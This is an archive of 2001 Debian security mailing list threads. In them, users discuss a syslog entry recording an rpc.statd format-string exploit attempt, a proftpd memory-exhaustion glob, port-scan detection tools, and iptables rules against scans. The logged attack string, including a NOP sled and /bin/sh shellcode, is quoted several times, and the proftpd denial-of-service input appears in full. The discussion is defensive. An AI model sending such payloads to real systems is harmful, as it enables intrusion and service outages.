Re: strange log entry
Yep, it's a security problem. Someone is trying to hack into your system using one of many known security bugs in the rpc daemon. If you don't need the rpc stuff running, then just disable it (better yet, uninstall it). If you really do need it running, but it's only used locally, then I suggest you use ipchains to drop any packets targeted to port 111. But best is to simply remove it entirely. --- Wade On Thu, 24 May 2001 05:07:33 GMT, [EMAIL PROTECTED] writes: Heya :) I was running a 'tail -f' on my /var/log/messages and this entry appeared whil e I was connected to the internet: May 24 10:08:11 noogies -- MARK -- May 24 10:20:34 noogies May 24 10:20:34 noogies /sbin/rpc.statd[151]: gethostbyname error for ^X÷ÿ¿^X÷ÿ¿^Y÷ÿ¿^Y÷ÿ¿^Z÷ÿ¿^Z÷ÿ¿^[÷ÿ¿^[÷ÿ¿%8x%8x%8x%8x%8x%8x%8x%8x%8x%236x%n %137x%n%10x%n%192x%n\220\220 \220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\2 20\2 20\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220 \220 \220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\2 20\2 20\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220 \220 \220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\2 20\2 20\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220 \220 \220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\2 20\2 20\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220 \220 \220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\2 20\2 20\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220 \220 \220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\2 20\2 20 May 24 10:20:34 noogies Ç^F/binÇF^D/shA0À\210F^G\211v^L\215V^P\215N^L\211ó°^KÍ\200°^AÍ\200è\177ÿÿÿ and it has me worried it may be a security issue. I'm very new to linux, and newer again to debian, and at this stage I really don't have a clue as to what the above log entry is trying to tell me... Any input or comments would be very appreciated :) Thank you - trevs -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED] -- /\ . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . \ / ASCII Ribbon Campaign| Wade Richards --- [EMAIL PROTECTED] X - NO HTML/RTF in e-mail | Fight SPAM! Join CAUCE. / \ - NO Word docs in e-mail | See http://www.cauce.org/ for details. -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]
Re: strange log entry
On Thu, May 24, 2001 at 04:10:13PM +0900, Curt Howland wrote: the last two i understand, as well as domain, but sunrpc and 1171? man fuser. Look for the -n option. i've cleaned up everything i can think of, but X11R6 says it still needs the RPC packages. Why does/would X11 require RPC? -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]
Re: strange log entry
On Thu, May 24, 2001 at 01:24:50AM -0400, Ed Street wrote: Hello, Well first off WHY are you running the rpc stuff? (i.e. I can root a redhat 6.x box in under 30 seconds with a rpc exploit from a clean install) Turn that stuff OFF. Not to start a thread discussing OSes, but ... OpenBSD ships with rstatd and ruserd enabled by default and according to http://www.openbsd.org/ Four years without a remote hole in the default install! Which begs the question, especially since the *BSD's release their sources under BSD style liscenses, why does rpc remain a security problem in Linux? Is it the kernel? Is it the rpc code? Simply curious, [EMAIL PROTECTED] -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]
Re: strange log entry
On Thu, May 24, 2001 at 04:50:57AM -0700, Jacob Meuser wrote: BS, when was the last time you installed OpenBSD? I just did an install 2.5 today. I guarantee portmap, ruserd, and rstatd are enabled by default, as the installer doesn't even ask what you want to activate, and these programs are part of the base tarball. in 2.5 ftpd, portmap, smtp, and identd were open, i am pretty sure rstatd was not. 2.6 i think disabled ftpd by default, shortly thereafter a root hole was found in openbsd's ftpd and they prompty said `ftpd is not enabled in the default install of 2.6 (or whatever) and thus there is no root hole in our default install' -- Ethan Benson http://www.alaska.net/~erbenson/ PGP signature
Re: strange log entry
On Thu, May 24, 2001 at 01:34:01AM -0700, Jacob Meuser wrote: OpenBSD ships with rstatd and ruserd enabled by default and according to http://www.openbsd.org/ Four years without a remote hole in the default install! Which begs the question, especially since the *BSD's release their sources under BSD style liscenses, why does rpc remain a security problem in Linux? Is it the kernel? Is it the rpc code? This is not the same stuff at all. They ship with rstatd turned on, not rpc.statd. They are completely different. rpc.statd is used by nfs. rstatd is used by the rstat program, which tells you info about machines on your network. It is like running 'uptime' on all your machines at once. noah -- ___ | Web: http://web.morgul.net/~frodo/ | PGP Public Key: http://web.morgul.net/~frodo/mail.html PGP signature
RE: strange log entry
Hello, that's simple ;) If they was stable/non-exploitable then we'd be using rpc inplace of ssh ;) Ed -Original Message- From: Jacob Meuser [mailto:[EMAIL PROTECTED]] Sent: Thursday, May 24, 2001 8:41 AM To: [EMAIL PROTECTED] Subject: Re: strange log entry On Thu, May 24, 2001 at 04:06:08AM -0800, Ethan Benson wrote: On Thu, May 24, 2001 at 04:50:57AM -0700, Jacob Meuser wrote: BS, when was the last time you installed OpenBSD? I just did an install 2.5 That was what, 2 years ago? today. I guarantee portmap, ruserd, and rstatd are enabled by default, as the installer doesn't even ask what you want to activate, and these programs are part of the base tarball. in 2.5 ftpd, portmap, smtp, and identd were open, i am pretty sure rstatd was not. 2.6 i think disabled ftpd by default, shortly thereafter a root hole was found in openbsd's ftpd and they prompty said `ftpd is not enabled in the default install of 2.6 (or whatever) and thus there is no root hole in our default install' Ah, they probably caught the problem shortly before 2.6 release, and didn't have time to fix ftp code, but changing rc.conf was doable. Anyway, as of 2.9, portmap, rstatd, ruserd, time, daytime, comsat, sshd and identd are enabled by default. Like I said, I didn't want to start a discussion about OpenBSD vs Linux, I have seen posts from you saying that you like some features of OpenBSD, /sbin/nologin for example. I'm just curious why the 'r' tools are apparently so vulnerable in Linux. If the OpenBSD folks are willing to risk creditability by claiming that their default install has no remote holes, while enabling portmap and rstatd by default, why can't Linux users feel safe running those daemons also? [EMAIL PROTECTED] -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED] -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]
RE: Problem with logging firewall packets
Hello, Make sure you have klogd and syslogd running. Ed -Original Message- From: Paul Dossett [mailto:[EMAIL PROTECTED]] Sent: Thursday, May 24, 2001 12:00 PM To: [EMAIL PROTECTED] Subject: Problem with logging firewall packets Hi guys/gals, Okay, I'm *really* embarrassed about this, but I can't get syslog to log firewall packets to a logfile - it insists on sending them to my Debian box's console. I've checked the /etc/syslog.conf file and there's no mention of a console there at all, so what am I doing wrong? The crappy ipchains test script I've rigged is working, a grc.com scan is being blocked in all the right ways, but I just can't get the logs on magnetic media... what really simple, obvious, even-a-redheaded-stepchild-could-work-it-out step am I missing? Thanks... Paul D -crap- -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED] -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]
msg from list when posting.
Hello, anyone know why I get this when I post anything to this list? Fatal Error: \n \nQuota for user [EMAIL PROTECTED] exceeded! \n \nOriginal message follows: \n \n it's from their mail delivery subsystem. Ed -Original Message- From: Ed Street [mailto:[EMAIL PROTECTED]] Sent: Thursday, May 24, 2001 12:10 PM To: [EMAIL PROTECTED] Subject: RE: strange log entry Hello, that's simple ;) If they was stable/non-exploitable then we'd be using rpc inplace of ssh ;) Ed -Original Message- From: Jacob Meuser [mailto:[EMAIL PROTECTED]] Sent: Thursday, May 24, 2001 8:41 AM To: [EMAIL PROTECTED] Subject: Re: strange log entry On Thu, May 24, 2001 at 04:06:08AM -0800, Ethan Benson wrote: On Thu, May 24, 2001 at 04:50:57AM -0700, Jacob Meuser wrote: BS, when was the last time you installed OpenBSD? I just did an install 2.5 That was what, 2 years ago? today. I guarantee portmap, ruserd, and rstatd are enabled by default, as the installer doesn't even ask what you want to activate, and these programs are part of the base tarball. in 2.5 ftpd, portmap, smtp, and identd were open, i am pretty sure rstatd was not. 2.6 i think disabled ftpd by default, shortly thereafter a root hole was found in openbsd's ftpd and they prompty said `ftpd is not enabled in the default install of 2.6 (or whatever) and thus there is no root hole in our default install' Ah, they probably caught the problem shortly before 2.6 release, and didn't have time to fix ftp code, but changing rc.conf was doable. Anyway, as of 2.9, portmap, rstatd, ruserd, time, daytime, comsat, sshd and identd are enabled by default. Like I said, I didn't want to start a discussion about OpenBSD vs Linux, I have seen posts from you saying that you like some features of OpenBSD, /sbin/nologin for example. I'm just curious why the 'r' tools are apparently so vulnerable in Linux. If the OpenBSD folks are willing to risk creditability by claiming that their default install has no remote holes, while enabling portmap and rstatd by default, why can't Linux users feel safe running those daemons also? [EMAIL PROTECTED] -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED] -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED] -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]
Re: Problem with logging firewall packets
I'm running Progeny, and had to go to Debian's testing distro to get klogd, but that doesn't seem to do anything... still investigating. Both syslogd and klogd are running, according to top.. :) Any more ideas? I'm really stumped. This worked fine under Red Hat. ppp - Original Message - From: Ed Street [EMAIL PROTECTED] To: Paul Dossett [EMAIL PROTECTED]; [EMAIL PROTECTED] Sent: Friday, May 25, 2001 2:17 AM Subject: RE: Problem with logging firewall packets Hello, Make sure you have klogd and syslogd running. Ed -Original Message- From: Paul Dossett [mailto:[EMAIL PROTECTED]] Sent: Thursday, May 24, 2001 12:00 PM To: [EMAIL PROTECTED] Subject: Problem with logging firewall packets Hi guys/gals, Okay, I'm *really* embarrassed about this, but I can't get syslog to log firewall packets to a logfile - it insists on sending them to my Debian box's console. I've checked the /etc/syslog.conf file and there's no mention of a console there at all, so what am I doing wrong? The crappy ipchains test script I've rigged is working, a grc.com scan is being blocked in all the right ways, but I just can't get the logs on magnetic media... what really simple, obvious, even-a-redheaded-stepchild-could-work-it-out step am I missing? Thanks... Paul D -crap- -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED] -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]
Re: Problem with logging firewall packets
- Original Message - From: Ronny Adsetts [EMAIL PROTECTED] To: Paul Dossett [EMAIL PROTECTED] Sent: Friday, May 25, 2001 2:27 AM Subject: RE: Problem with logging firewall packets Okay, I'm *really* embarrassed about this, but I can't get syslog to log firewall packets to a logfile - it insists on sending them to my Debian box's console. I've checked the /etc/syslog.conf file and there's no mention of a console there at all, so what am I doing wrong? The crappy ipchains test script I've rigged is working, a grc.com scan is being blocked in all the right ways, but I just can't get the logs on magnetic media... what really simple, obvious, even-a-redheaded-stepchild-could-work-it-out step am I missing? Probably klogd is missing. try: # apt-get update apt-get install klogd It was installed, but the kicker was that something seemed to be wrong with the init script, the syslogd and klogd daemons weren't restarting when I executed their scripts, so the changes I made in the syslog.conf file were being ignored. Manually killing the processes and restarting them worked, and logging is back... thanks all! Hopefully I can return the favour for some *other* foolish newbie... ;) ppp -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]
Re: Problem with logging firewall packets
Havent seen this before but a work around could be just have syslog-ng read from /proc/kmsg does the same thing as a klogd would do. On Fri, 25 May 2001, Paul Dossett wrote: I'm running Progeny, and had to go to Debian's testing distro to get klogd, but that doesn't seem to do anything... still investigating. Both syslogd and klogd are running, according to top.. :) Any more ideas? I'm really stumped. This worked fine under Red Hat. ppp - Original Message - From: Ed Street [EMAIL PROTECTED] To: Paul Dossett [EMAIL PROTECTED]; [EMAIL PROTECTED] Sent: Friday, May 25, 2001 2:17 AM Subject: RE: Problem with logging firewall packets Hello, Make sure you have klogd and syslogd running. Ed -Original Message- From: Paul Dossett [mailto:[EMAIL PROTECTED]] Sent: Thursday, May 24, 2001 12:00 PM To: [EMAIL PROTECTED] Subject: Problem with logging firewall packets Hi guys/gals, Okay, I'm *really* embarrassed about this, but I can't get syslog to log firewall packets to a logfile - it insists on sending them to my Debian box's console. I've checked the /etc/syslog.conf file and there's no mention of a console there at all, so what am I doing wrong? The crappy ipchains test script I've rigged is working, a grc.com scan is being blocked in all the right ways, but I just can't get the logs on magnetic media... what really simple, obvious, even-a-redheaded-stepchild-could-work-it-out step am I missing? Thanks... Paul D -crap- -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED] -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED] -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]
proftpd exploit??
Hi!! I have Potato in a machine, with ii proftpd1.2.0pre10-2.0 Versatile, virtual-hosting FTP daemon It's the last version in security.debian.org I've tried to exploit it by login and sending: ls ../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../ and suddenly it began eating memory and getting slow all the system. When I killed proftpd, system was almost KO. Any solution?? Thanks in advance :-) -- 101 Things you do NOT want your System Administrator to say. 93. We don't support that. We won't support that. -- Cagarruta [EMAIL PROTECTED] Linux Reg. User #66054 -- -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]
Re: proftpd exploit??
On Thu, 24 May 2001, Andres Herrera wrote: I've tried to exploit it by login and sending: ls ../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../ and suddenly it began eating memory and getting slow all the system. ... Any solution?? Resource limits on the ftp server process? Zak. -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]
Re: proftpd exploit??
Zak Kipling wrote: On Thu, 24 May 2001, Andres Herrera wrote: I've tried to exploit it by login and sending: ls ../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../ and suddenly it began eating memory and getting slow all the system. ... Any solution?? Resource limits on the ftp server process? what about PathDenyFilter? robt -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]
Re: strange log entry
On Thu, May 24, 2001 at 07:33:44AM +, Jim Breton wrote: On Thu, May 24, 2001 at 04:10:13PM +0900, Curt Howland wrote: the last two i understand, as well as domain, but sunrpc and 1171? man fuser. Look for the -n option. ... or look for -p option of netstat :) Mirek -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]
Re: proftpd exploit??
Hi!! Thanks to everybody (and sorry for my english 0:) ) I've choosed the DenyFilter option and everything goes OK again :- The user just get and Forbidden command argument message. ... and certainly I'm subcribing my account to the proftpd mailing list ;-) Thanks again -- 101 Things you do NOT want your System Administrator to say. 94. ...and after I patched the microcode... -- Cagarruta [EMAIL PROTECTED] Linux Reg. User #66054 -- -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]
detecting portscanning
Hello Everyone, It is my first time i'm putting up a server (at home, cable modem) with ftp/ssh/apache on it. Now I would like to know who does portscans on my machine, and when. And how many. Is there a package for it in debian? Or do I have to install something else. Thanks in advance, Rudy -- ___ _ _ ___ |_ / / _ \| | | |/ __| e:[EMAIL PROTECTED] phone: 0486/690159 / / | __/| |_| |\__ \ url: http://studwww.rug.ac.be/~rgevaert/ /___| \___| \__,_||___/ http://zeus.rug.ac.be -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]
Re: detecting portscanning
On Thu, 24 May 2001, Rudy Gevaert wrote: Hello again, Some people suggested ippl, I installed it, and it runs. It works :-) Some other people, said I should use portsentry. And I look for it on the website, and it is a tar.gz file, but in the unstable section I can find a deb file. But I'm using stable. Will this give any problems? Or can I just download it? I think I will have to add a line to my apt-get config file. Right? Again, thanks in advance, Rudy -- ___ _ _ ___ |_ / / _ \| | | |/ __| e:[EMAIL PROTECTED] phone: 0486/690159 / / | __/| |_| |\__ \ url: http://studwww.rug.ac.be/~rgevaert/ /___| \___| \__,_||___/ http://zeus.rug.ac.be -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]
Re: detecting portscanning
On Thursday 24 May 2001 14:01, Rudy Gevaert wrote: On Thu, 24 May 2001, Rudy Gevaert wrote: Hello again, Some people suggested ippl, I installed it, and it runs. It works :-) Some other people, said I should use portsentry. And I look for it on the website, and it is a tar.gz file, but in the unstable section I can find a deb file. But I'm using stable. Will this give any problems? Or can I just download it? I think I will have to add a line to my apt-get config file. Right? Again, thanks in advance, Rudy The problem with portsentry is that it binds to all the ports you are watching, so people that are scanning actually see those ports open. It is better to use snort, which will let you know that the scans have happened without the attacker being aware. -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]
RE: detecting portscanning
Hello, there's several methods to tell that. a) use a product like portsentry b) use iptables/ipchains to reject all forms of portscans c) don't connect the box to the inet as portscans are a fact of life ;) portsentry will trashcan any system that attempts to portscan you. If your using 2.2.x you may want to put on the stealth kernel patch (freshmeat.net search for stealth) that helps hinder scans iptables has an awsome mechanism for portscans ;) in fact you can set it up so that all portscans (well most I should say) will literaly take HOURS to return nothing. Ed -Original Message- From: Rudy Gevaert [mailto:[EMAIL PROTECTED]] Sent: Thursday, May 24, 2001 4:17 PM To: [EMAIL PROTECTED] Subject: detecting portscanning Hello Everyone, It is my first time i'm putting up a server (at home, cable modem) with ftp/ssh/apache on it. Now I would like to know who does portscans on my machine, and when. And how many. Is there a package for it in debian? Or do I have to install something else. Thanks in advance, Rudy -- ___ _ _ ___ |_ / / _ \| | | |/ __| e:[EMAIL PROTECTED] phone: 0486/690159 / / | __/| |_| |\__ \ url: http://studwww.rug.ac.be/~rgevaert/ /___| \___| \__,_||___/ http://zeus.rug.ac.be -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED] -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]
RE: detecting portscanning
On Thu, 24 May 2001, Ed Street wrote: Hello, there's several methods to tell that. a) use a product like portsentry b) use iptables/ipchains to reject all forms of portscans c) don't connect the box to the inet as portscans are a fact of life ;) portsentry will trashcan any system that attempts to portscan you. If your using 2.2.x you may want to put on the stealth kernel patch (freshmeat.net search for stealth) that helps hinder scans iptables has an awsome mechanism for portscans ;) in fact you can set it up so that all portscans (well most I should say) will literaly take HOURS to return nothing. Ok thanks, I'll use iptable when I got my network running. Now it is just a standalone box. I'm running ippl and it logs the most things. It will work for now I think ;) Thanks to everyone for all the help! Greetings, Rudy -- ___ _ _ ___ |_ / / _ \| | | |/ __| e:[EMAIL PROTECTED] phone: 0486/690159 / / | __/| |_| |\__ \ url: http://studwww.rug.ac.be/~rgevaert/ /___| \___| \__,_||___/ http://zeus.rug.ac.be -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]
RE: detecting portscanning
# echo Rejecting Portscans # # #Reject Xms Scans # # Generic dirty interface maping $IPTABLES -A INPUT -p tcp --tcp-flags ALL FIN,URG,PSH -j LOG \ --log-level $LOG_LEVEL \ -m limit --limit $LIMIT_RATE $IPTABLES -A INPUT -p tcp --tcp-flags ALL FIN,URG,PSH -j DROP # This disallows ALL portscans that will hit the PREROUTING table $IPTABLES -t nat -A PREROUTING -p tcp --tcp-flags ALL FIN,URG,PSH -j LOG \ --log-level $LOG_LEVEL \ -m limit --limit $LIMIT_RATE $IPTABLES -t nat -A PREROUTING -p tcp --tcp-flags ALL FIN,URG,PSH -j DROP # # #Reject Fin scans # $IPTABLES -A INPUT -p tcp --tcp-flags ALL FIN -m state --state ! ESTABLISHED \ -j LOG --log-level $LOG_LEVEL \ -m limit --limit $LIMIT_RATE $IPTABLES -A INPUT -p tcp --tcp-flags ALL FIN -m state --state ! ESTABLISHED -j DROP # This disallows ALL portscans that will hit the PREROUTING table $IPTABLES -t nat -A PREROUTING -p tcp --tcp-flags ALL FIN \ -j LOG --log-level $LOG_LEVEL \ -m limit --limit $LIMIT_RATE $IPTABLES -t nat -A PREROUTING -p tcp --tcp-flags ALL FIN -j DROP # # # Reject ANY station that opens and immediately closes a connection # Some portscanners does this # $IPTABLES -A INPUT -p tcp --tcp-flags ALL SYN,FIN -j LOG \ --log-level $LOG_LEVEL \ -m limit --limit $LIMIT_RATE $IPTABLES -A INPUT -p tcp --tcp-flags ALL SYN,FIN -j DROP $IPTABLES -t nat -A PREROUTING -p tcp --tcp-flags ALL SYN,FIN \ -j LOG --log-level $LOG_LEVEL \ -m limit --limit $LIMIT_RATE $IPTABLES -t nat -A PREROUTING -p tcp --tcp-flags ALL SYN,FIN -j DROP # # # invalid crap # $IPTABLES -t mangle -A PREROUTING -j LOG --log-level $LOG_LEVEL \ -m state --state INVALID \ -m limit --limit $LIMIT_RATE # This isn't complete as the SYN scan will still get thru BUT it will take ages to show anything. Also use of rp_filter ('spoof' protection) helps out to. Ed -Original Message- From: S.Salman Ahmed [mailto:[EMAIL PROTECTED]] Sent: Thursday, May 24, 2001 8:11 PM To: [EMAIL PROTECTED] Subject: RE: detecting portscanning Ed == Ed Street [EMAIL PROTECTED] writes: Ed Ed iptables has an awsome mechanism for portscans ;) in fact you Ed can set it up so that all portscans (well most I should say) Ed will literaly take HOURS to return nothing. Ed What iptables rule(s) would cause that behaviour ? -- Salman Ahmed ssahmed AT pathcom DOT com -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED] -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]
Re: detecting portscanning
Hello, --- Rudy Gevaert [EMAIL PROTECTED] wrote: It is my first time i'm putting up a server (at home, cable modem) with ftp/ssh/apache on it. Now I would like to know who does portscans on my machine, and when. And how many. Is there a package for it in debian? Or do I have to install something else. Check out www.snort.org. Snort capable to detect portscans. Note, that not only portscans, but other strange activities (i.e. tracing, os fingerprinting, etc) and attacks. You can download sources from original site or get *.deb from debian (it included into latest release). = Regards, Vladislav. --- http://cybervlad.port5.com __ Do You Yahoo!? Yahoo! Auctions - buy the things you want at great prices http://auctions.yahoo.com/ -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]
strange log entry
Heya :) I was running a 'tail -f' on my /var/log/messages and this entry appeared while I was connected to the internet: May 24 10:08:11 noogies -- MARK -- May 24 10:20:34 noogies May 24 10:20:34 noogies /sbin/rpc.statd[151]: gethostbyname error for ^X÷ÿ¿^X÷ÿ¿^Y÷ÿ¿^Y÷ÿ¿^Z÷ÿ¿^Z÷ÿ¿^[÷ÿ¿^[÷ÿ¿%8x%8x%8x%8x%8x%8x%8x%8x%8x%236x%n%137x%n%10x%n%192x%n\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220 May 24 10:20:34 noogies Ç^F/binÇF^D/shA0À\210F^G\211v^L\215V^P\215N^L\211ó°^KÍ\200°^AÍ\200è\177ÿÿÿ and it has me worried it may be a security issue. I'm very new to linux, and newer again to debian, and at this stage I really don't have a clue as to what the above log entry is trying to tell me... Any input or comments would be very appreciated :) Thank you - trevs
RE: strange log entry
Hello, Well first off WHY are you running the rpc stuff? (i.e. I can root a redhat 6.x box in under 30 seconds with a rpc exploit from a clean install) Turn that stuff OFF. Ed -Original Message- From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED] Sent: Thursday, May 24, 2001 1:08 AM To: debian-security@lists.debian.org Subject: strange log entry Heya :) I was running a 'tail -f' on my /var/log/messages and this entry appeared while I was connected to the internet: May 24 10:08:11 noogies -- MARK -- May 24 10:20:34 noogies May 24 10:20:34 noogies /sbin/rpc.statd[151]: gethostbyname error for ^X÷ÿ¿^X÷ÿ¿^Y÷ÿ¿^Y÷ÿ¿^Z÷ÿ¿^Z÷ÿ¿^[÷ÿ¿^[÷ÿ¿%8x%8x%8x%8x%8x%8x%8x%8x%8x%236x%n%1 37x%n%10x%n%192x%n\220\220\220\220\220\220\220\220\220\220\220\220\220\220\2 20\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\2 20\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\2 20\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\2 20\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\2 20\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\2 20\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\2 20\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\2 20\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\2 20\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\2 20\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\2 20\220\220\220\220\220\220\220\220\220\220\220\220 May 24 10:20:34 noogies Ç^F/binÇF^D/shA0À\210F^G\211v^L\215V^P\215N^L\211ó°^KÍ\200°^AÍ\200è\177ÿÿÿ and it has me worried it may be a security issue. I'm very new to linux, and newer again to debian, and at this stage I really don't have a clue as to what the above log entry is trying to tell me... Any input or comments would be very appreciated :) Thank you - trevs -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]
Re: strange log entry
Yep, it's a security problem. Someone is trying to hack into your system using one of many known security bugs in the rpc daemon. If you don't need the rpc stuff running, then just disable it (better yet, uninstall it). If you really do need it running, but it's only used locally, then I suggest you use ipchains to drop any packets targeted to port 111. But best is to simply remove it entirely. --- Wade On Thu, 24 May 2001 05:07:33 GMT, [EMAIL PROTECTED] writes: Heya :) I was running a 'tail -f' on my /var/log/messages and this entry appeared whil e I was connected to the internet: May 24 10:08:11 noogies -- MARK -- May 24 10:20:34 noogies May 24 10:20:34 noogies /sbin/rpc.statd[151]: gethostbyname error for ^X÷ÿ¿^X÷ÿ¿^Y÷ÿ¿^Y÷ÿ¿^Z÷ÿ¿^Z÷ÿ¿^[÷ÿ¿^[÷ÿ¿%8x%8x%8x%8x%8x%8x%8x%8x%8x%236x%n %137x%n%10x%n%192x%n\220\220 \220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\2 20\2 20\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220 \220 \220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\2 20\2 20\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220 \220 \220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\2 20\2 20\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220 \220 \220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\2 20\2 20\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220 \220 \220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\2 20\2 20\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220 \220 \220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\2 20\2 20 May 24 10:20:34 noogies Ç^F/binÇF^D/shA0À\210F^G\211v^L\215V^P\215N^L\211ó°^KÍ\200°^AÍ\200è\177ÿÿÿ and it has me worried it may be a security issue. I'm very new to linux, and newer again to debian, and at this stage I really don't have a clue as to what the above log entry is trying to tell me... Any input or comments would be very appreciated :) Thank you - trevs -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED] -- /\ . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . \ / ASCII Ribbon Campaign| Wade Richards --- [EMAIL PROTECTED] X - NO HTML/RTF in e-mail | Fight SPAM! Join CAUCE. / \ - NO Word docs in e-mail | See http://www.cauce.org/ for details.
Re: strange log entry
